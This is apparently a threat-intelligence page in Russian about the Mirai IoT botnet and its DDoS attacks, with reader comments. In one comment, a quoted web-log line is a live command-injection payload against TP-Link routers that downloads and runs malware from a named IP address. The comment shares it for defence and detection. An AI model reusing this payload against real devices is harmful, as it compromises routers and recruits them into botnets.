[GS-449] Mirai Botnet IOCs

botnet

Mirai - один из первых значительных ботнетов, нацеленных на открытые сетевые устройства под управлением Linux.

Описание

Ботнет Mirai Internet of Things (IoT), печально известный своими атаками на подключенные бытовые устройства, такие как
камеры, системы сигнализации и персональные маршрутизаторы, продолжает развиваться и представляет собой серьезную угрозу
кибербезопасности. В его истории есть опыт проведения масштабных DDoS-атак, в том числе крупного инцидента, который вывел из
строя большую часть американского интернета.

DDoS-атака ботнета относительно проста. Он отдает команды управляющему серверу, который затем отдает команды атаки
каждому отдельному узлу (зараженным устройствам) в ботнете. Эти узлы, в свою очередь, отправляют атакующий трафик на цель.

Индикаторы компрометации

Комментарии: 2
Brett C
2 года
0

A common vector of attack is this string showing up in your web server logs:

> /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`)

User agent is commonly showing as: Go-http-client/1.1

The IP in the string above is listed in the list in the original post. The content within the shk file is architecture check, and pulls the appropriate arch elf file to infect the machine.

Алексей И.
2 года
0

Thanks for the helpful addition